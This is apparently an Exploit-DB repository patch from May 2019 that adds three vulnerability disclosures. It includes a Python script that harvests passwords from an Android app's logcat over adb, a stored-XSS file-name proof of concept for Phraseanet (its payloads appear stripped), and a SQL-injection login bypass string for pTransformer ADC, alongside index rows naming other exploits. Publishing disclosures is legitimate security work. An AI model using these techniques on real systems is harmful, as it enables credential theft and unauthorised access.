From 1a6935f64aa2e5e3e0b9fb2a15aee17a6f291027 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 29 May 2019 05:01:59 +0000 Subject: [PATCH] DB: 2019-05-29 3 changes to exploits/shellcodes Microsoft Windows - 'Win32k' Local Privilege Escalation EquityPandit 1.0 - Password Disclosure Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass Phraseanet < 4.0.7 - Cross-Site Scripting --- exploits/android/local/46933.txt | 48 +++++++++++++++++++++++++++++ exploits/multiple/webapps/46935.txt | 20 ++++++++++++ exploits/windows/remote/46934.txt | 24 +++++++++++++++ files_exploits.csv | 5 ++- 4 files changed, 96 insertions(+), 1 deletion(-) create mode 100644 exploits/android/local/46933.txt create mode 100644 exploits/multiple/webapps/46935.txt create mode 100644 exploits/windows/remote/46934.txt diff --git a/exploits/android/local/46933.txt b/exploits/android/local/46933.txt new file mode 100644 index 000000000..317756931 --- /dev/null +++ b/exploits/android/local/46933.txt @@ -0,0 +1,48 @@ +#Exploit title: EquityPandit v1.0 - Insecure Logging +#Date:27/05/2019 +#Exploit Author: ManhNho +#Software name: "EquityPandit" +#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit +#Version: 1.0 +# Category: Android apps +#Description: + + - Sometimes developers keeps sensitive data logged into the developer + console. Thus, attacker easy to capture sensitive information like password. + - In this application, with adb, attacker can capture password of any + users via forgot password function. + +#Requirement: + + - Santoku virtual machine + - Android virtual machine (installed "EquityPandit" apk file) + - Victim user/password: victim@abc.com/123456 + - Exploit code named capture.py in Santoku vm as below: + +import subprocess +import re + +process_handler = subprocess.Popen(['adb', 'logcat', '-d'], +stdout=subprocess.PIPE) +dumps = process_handler.stdout.read() +password_list = re.findall(r'password\s(.*)', dumps) +print 'Captured %i passwords! \nThey are:' %len(password_list) +for index, item in enumerate(password_list): + print '\t#%i: %s' %(int(index)+1, item) + +#Reproduce: + + - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x) + +adb connect x.x.x.x + + + - Step 2: From Android machine, open EquityPandit, click forgot password + function for acccount "victim@abc.com" and then click submit + - Step 3: From Santoku, execute capture.py + - Actual: Password of "victim@abc.com" will be show in terminal as + "123456" + +#Demo: + +https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv \ No newline at end of file diff --git a/exploits/multiple/webapps/46935.txt b/exploits/multiple/webapps/46935.txt new file mode 100644 index 000000000..3b7e7084b --- /dev/null +++ b/exploits/multiple/webapps/46935.txt @@ -0,0 +1,20 @@ +# Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software +# Date: 10/10/2018 +# Exploit Author: Krzysztof Szulski +# Vendor Homepage: https://www.phraseanet.com +# Software Link (also VM): https://www.phraseanet.com/en/download/ # Version affected: 4.0.3 (4.0.4-dev) and below +# Version fixed: 4.0.7 +# Proof of concept. + +Phraseanet is an Open Source Digital Asset Management software distributed under GNU GPLV3 license. +Registered user (or even guest user, depends of configuration) can upload pictures, videos, pdfs or any other document. +A crafted file name for uploaded document leads to stored XSS. In simplest form the name of the file would be: +">.jpg +or: +">.jpg +Please notice that the file name should start from double quotation mark. +Once a picture will be uploaded it will pop up an alert window and keep popping up every time anybody will login to the website. +Another example of more malicious usage would be this file name: +">.jpg +From now on every attempt to login will end up with redirection one step back - to login page. +Please be aware that this will not affect Chrome browser and other browsers built on chrome engine which has XSS filter built in. \ No newline at end of file diff --git a/exploits/windows/remote/46934.txt b/exploits/windows/remote/46934.txt new file mode 100644 index 000000000..7e6a2f996 --- /dev/null +++ b/exploits/windows/remote/46934.txt @@ -0,0 +1,24 @@ +# Exploit Title: Petraware pTransformer ADC before 2.1.7.22827 allows SQL +Injection via the User ID parameter to the login form. +# Date: 28-05-2019 +# Exploit Author: Faudhzan Rahman +# Website: https://faudhzanrahman.blogspot.com/ +# Vendor Homepage: http://www.petraware.com +# Version: 2.0 +# CVE : CVE-2019-12372 +# Tested on: Windows 10 Pro + +*Description* + +The login form on pTransformer ADC does not filter dangerous character such +as single quote ('). This has cause the application to be vulnerable to SQL +Injection. + +*Proof-of-concept* + +The vulnerable parameter is User ID. By injecting ' or '1'='1'-- ,it will +bypass the login form. + +*Reference* + +https://faudhzanrahman.blogspot.com/2019/05/sql-injection-on-login-form.html \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f5cbbfdcc..d6a6f7f3f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10527,8 +10527,9 @@ id,file,description,date,author,type,platform,port 46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos, 46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows, 46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows, -46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,ExpLife0011,local,windows, +46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows, 46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows, +46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17467,6 +17468,7 @@ id,file,description,date,author,type,platform,port 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php, 46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows, 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos, +46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41352,3 +41354,4 @@ id,file,description,date,author,type,platform,port 46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php, 46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php, 46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple, +46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,